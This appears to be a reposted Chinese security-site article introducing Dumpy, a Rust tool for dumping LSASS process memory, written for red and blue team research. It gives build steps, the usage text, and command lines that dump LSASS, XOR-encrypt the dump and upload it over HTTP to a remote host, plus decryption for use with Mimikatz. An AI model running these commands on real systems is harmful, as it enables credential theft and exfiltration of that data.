Dumpy:一款针对LSASS数据的动态内存取证工具

2024-08-23 168 0

关于Dumpy

Dumpy是一款针对LSASS数据的动态内存取证工具,该工具专为红队和蓝队研究人员设计,支持重新使用打开的句柄来动态转储 LSASS。

运行机制

Dumpy可以动态调用 MiniDumpWriteDump 来转储 lsass 内存内容。此过程无需打开 lsass 的新进程句柄,也无需使用DInvoke_rs

为了在不调用 lsass 上的 OpenProcess 的情况下获得有效的进程句柄,系统中的所有进程句柄都使用 NtQuerySystemInformation、NtDuplicateObject、NtQueryObject 和 QueryFullProcessImageNameW 进行分析。

在将内存转储存储到磁盘或通过 HTTP 发送之前,该工具会使用 NTFS 事务对其进行异或运算。

工具要求

Rust

cargo

工具安装

接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

C:\Users\User\Desktop> git clone https://github.com/Kudaes/Dumpy.git

然后在release模式下编译项目代码并执行即可:

C:\Users\User\Desktop\Dumpy\dumpy> cargo build --release

C:\Users\User\Desktop\Dumpy\dumpy\target\x86_64-pc-windows-msvc\release> dumpy.exe -h

如果您想要为 x86 系统编译该工具,请修改文件 .cargo\config 中的选项“target”的值(例如:target =“i686-pc-windows-msvc”)。

工具使用

Usage: dumpy.exe --dump|--decrypt [options]

 

Options:

    -h, --help            打印工具帮助信息你

        --dump          转储Lsass数据

        --decrypt        解密之前生成的转储文件

    -f, --force            通过竞争条件强制服务暴露lsass句柄、

    -k, --key             加密密钥 [默认: 1234abcd]

    -i, --input            加密转储文件 [默认: c:\temp\input.txt]

    -o, --output          目的路径 [默认: c:\temp\output.txt]

-u, --upload          上传URL

工具运行演示

dump命令

它将执行转储 lsass 的主要逻辑。默认情况下,它将结果存储在当前目录中具有随机名称的 xored 文本文件中。upload 选项允许通过 HTTP 将内存内容发送到远程主机,从而避免在磁盘上创建 xored 文件。相关命令执行如下:

C:\Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload

使用竞争条件中强制暴露lsass句柄,并结合force参数:

C:\Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload --force

decrypt命令

此操作允许以与 Mimikatz 等工具所期望的格式相同的格式获取解密的内存转储。它需要 xored 内存转储、加密密钥和输出文件路径作为参数。如果 xored 文件是使用 HTTP 上传的,则需要在解密过程之前对内容执行 base64 解码:

C:\Temp> dumpy.exe --decrypt -i xored.txt -o decrypted.txt -k secretKey

许可证协议

本项目的开发与发布遵循GPL-3.0开源许可协议。

项目地址

Dumpy:【GitHub传送门

参考资料

https://github.com/Kudaes/DInvoke_rs

https://gist.github.com/smidgedy/1986e52bb33af829383eb858cb38775c

https://twitter.com/splinter_code

https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

办事处网络安全监控与事件响应;国外员工终端安全性怎么保障 | FB甲方群话题讨论
拿不下总统之位,那就用热加载拿下验证码识别与爆破好了!
Sooty:一款SoC分析一体化与自动化CLI工具
shiro CVE-2016-6802 路径绕过(越权)
Apache Solr 身份验证绕过漏洞(CVE-2024-45216)详解
llama_index的CVE-2024-4181漏洞根因分析

发布评论